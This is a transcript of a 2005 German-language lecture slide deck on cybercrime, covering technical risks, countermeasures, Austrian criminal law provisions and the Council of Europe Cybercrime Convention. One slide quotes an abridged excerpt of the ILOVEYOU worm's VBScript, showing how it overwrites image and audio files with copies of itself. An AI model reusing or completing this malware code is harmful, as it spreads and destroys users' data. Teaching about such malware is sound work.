Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

2005 (C) Wolfram Proksch cybercrime.at ::.technische risken.strafrecht.

Ähnliche Präsentationen


Präsentation zum Thema: "2005 (C) Wolfram Proksch cybercrime.at ::.technische risken.strafrecht."—  Präsentation transkript:

1 2005 (C) Wolfram Proksch cybercrime.at ::.technische risken.strafrecht

2 2005 (C) Wolfram Proksch.technische risken Fälschung / Verfälschung von Daten Authentizität : Integrität : Vertraulichkeit Frame-Spoofing / Web-Spoofing Ausnutzung der Frame-Architektur Cookies ermöglichen Markierung & Wiedererkennung von Nutzern C:\WINDOWS\Cookies\ Web-Wanzen, Web-Bugs

3 2005 (C) Wolfram Proksch Paket-Sniffer / IP-Spoofing Programme zur Überwachung der Daten an den Netzwerkknoten [keywords] Trojanische Pferde Viren & Würmer

4 rem barok -loveletter(vbe) rem by: spyder / Group / Manila,Philippines On Error Resume Next […][…] bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end Auszug aus dem Programm-Code des I-Love-You-Virus

5 2005 (C) Wolfram Proksch.technische gegenmittel Kryptographie sichere Kommunikationsprotokolle /-kanäle https:// SET Schutzprogramme Virenschutz Cookie-Killer Firewall, Proxy,

6 2005 (C) Wolfram Proksch.rechtlicher rahmen Strafgesetzbuch [ StGB ] § 118a StGB - Widerrechtlicher Zugriff auf Computersysteme § 119 StGB - Verletzung des Telekommunikationsgeheimnisses § 119a StGB - Missbräuchliches Abfangen von Daten § 126a StGB - Datenbeschädigung § 126b StGB - Störung der Funktionsfähigkeit eines Computersystems § 126c StGB - Missbrauch von Computerprogrammen oder Zugangsdaten § 148a StGB - Betrügerischer Datenverarbeitungsmissbrauch Zugangskontrollgesetz [ ZuKG ] - § 10 E-Commercegesetz [ ECG ] §§ 13 ff ECG - Providerhaftung, § 18 Mitwirkungspflicht Datenschutzgesetz [ DSG 2000 ] §§ 51 u. 52 DSG 2000 Urheberrechtsgesetz [ UrhG ] §§ 91 ff UrhG Telekommunikationsgesetz [ TKG ] § 89 TKG - Mitwirkungspflicht

7 2005 (C) Wolfram Proksch § 118a StGB.widerrechtlicher zugriff auf ein computersystem § 118a. (1) Wer sich in der Absicht, sich oder einem anderen Unbefugten von in einem Computersystem gespeicherten und nicht für ihn bestimmten Daten Kenntnis zu verschaffen und dadurch, dass er die Daten selbst benützt, einem anderen, für den sie nicht bestimmt sind, zugänglich macht oder veröffentlicht, sich oder einem anderen einen Vermögensvorteil zuzuwenden oder einem anderen einen Nachteil zuzufügen, zu einem Computersystem, über das er nicht oder nichtallein verfügen darf, oder zu einem Teil eines solchen Zugang verschafft, indem er spezifische Sicherheitsvorkehrungen im Computersystem verletzt, ist mit Freiheitsstrafe bis zu sechs Monaten oder mit Geldstrafe bis zu 360 Tagessätzen zu bestrafen. (2) Der Täter ist nur mit Ermächtigung des Verletzten zu verfolgen.

8 2005 (C) Wolfram Proksch § 126a StGB.datenbeschädigung wer einen anderen dadurch schädigt, dass er automationsunterstützt verarbeitete, übermittelte oder überlassene Daten, über die er nicht oder nicht allein verfügen darf, verändert, löscht oder sonst unbrauchbar macht oder unterdrückt. Strafdrohung bis 5 Jahren Freiheitsstrafe (gestaffelt nach Schadenshöhe)

9 2005 (C) Wolfram Proksch § 148a StGB.betrügerischer datenverarbeitungsmissbrauch wer - mit dem Vorsatz, sich oder einen Dritten unrechtmäßig zu bereichern - einen anderen dadurch am Vermögen schädigt, dass er das Ergebnis einer automationsunterstützten Datenverarbeitung durch Gestaltung des Programms, durch Eingabe, Veränderung oder Löschung von Daten [ § 126 a Abs. 2 StGB ] oder sonst durch Einwirkung auf den Ablauf des Verarbeitungsvorgangs beeinflusst Strafdrohung bis 3 Jahre, bei gewerbsm. Begehung bis 10 Jahre Freiheitsstrafe

10 2005 (C) Wolfram Proksch § 10 ZuKG.eingriff in das recht auf zugangskontrolle § 10. (1) Wer gewerbsmäßig (§ 70 StGB) Umgehungsvorrichtungen vertreibt, verkauft, vermietet oder verpachtet, ist vom Gericht mit Freiheitsstrafe bis zu zwei Jahren oder mit Geldstrafe bis zu 360 Tagessätzen zu bestrafen. (2) Ebenso ist zu bestrafen, wer gewerbsmäßig (§ 70StGB) Umgehungs- vorrichtungen herstellt, einführt oder mit dem Vorsatz erwirbt oder innehat, dass diese auf die im Abs. 1 beschriebene Art und Weise in Verkehr gebracht werden oder dass mit ihrer Hilfe anderen der Zugang zu einem geschützten Dienst ermöglicht wird. (3) Wer Umgehungsvorrichtungen ausschließlich zum privaten Gebrauch einführt, erwirbt oder sich sonst verschafft, ist nicht als Beteiligter (§ 12 StGB) zu bestrafen. (4) Ein Bediensteter oder Beauftragter des Inhabers oder Leiter eines Unternehmens (§5) ist nicht zu bestrafen, wenn er eine der in den Abs. 1 und 2 genannten Handlungen auf Anordnung des Dienst- oder Auftrag- gebers vorgenommen hat und ihm wegen seiner wirtschaftlichen Abhängigkeit nicht zugemutet werden konnte, die Vornahme der Tat zu unterlassen. (5) Der Täter ist nur auf Verlangen des in seinen Rechten verletzten Diensteanbieters zu verfolgen.

11 2005 (C) Wolfram Proksch.internationaler rechtsrahmen Convention on Cybercrime Council of Europe, ETS No. 185, Budapest, 23.XI.2001

12 2005 (C) Wolfram Proksch.convention on cybercrime die Konvention ist der erste internationale Vertrag, welcher sich gegen Verbrechen richtet, welche über das Internet oder vergleichbare Netze begangen werden. Sie enthält insb Bestimmungen zu Urheberrechtsverletzungen Computer-Betrug Kinderpornographie Netzwerksicherheits-Verletzungen die Konvention enthält auch eine Reihe von Bestimmungen zum Verfahren bzw. zu Überwachungsrechten - insb auch zur Durchsuchung und Überwachung von Computernetzen Die Konvention wurde durch ein Zusatzprotokoll ergänzt, welches auch die Veröffentlichung fremdenfeindlicher und rassistischer Propaganda im Internet bzw in vergleichbaren Computer-Netzen unter Strafe stellt.

13 2005 (C) Wolfram Proksch haupt.ziel das Ziel der Konvention ist in der Präambel wie folgt vorgegeben to pursue a common criminal policy aimed at the protection of society against cybercrime, especially by adopting appropriate legislation and fostering international co-operation

14 2005 (C) Wolfram Proksch.wesentliche bestimmungen Article 2 – Illegal access Article 3 – Illegal interception Article 4 – Data interference Article 5 – System interference Article 6 – Misuse of devices Article 7 – Computer-related forgery Article 8 – Computer-related fraud Article 9 – Offences related to child pornography Article 10 – Offences related to infringements of copyright... Article 11 – Attempt and aiding or abetting Article 12 – Corporate liability

15 2005 (C) Wolfram Proksch.ende


Herunterladen ppt "2005 (C) Wolfram Proksch cybercrime.at ::.technische risken.strafrecht."

Ähnliche Präsentationen


Google-Anzeigen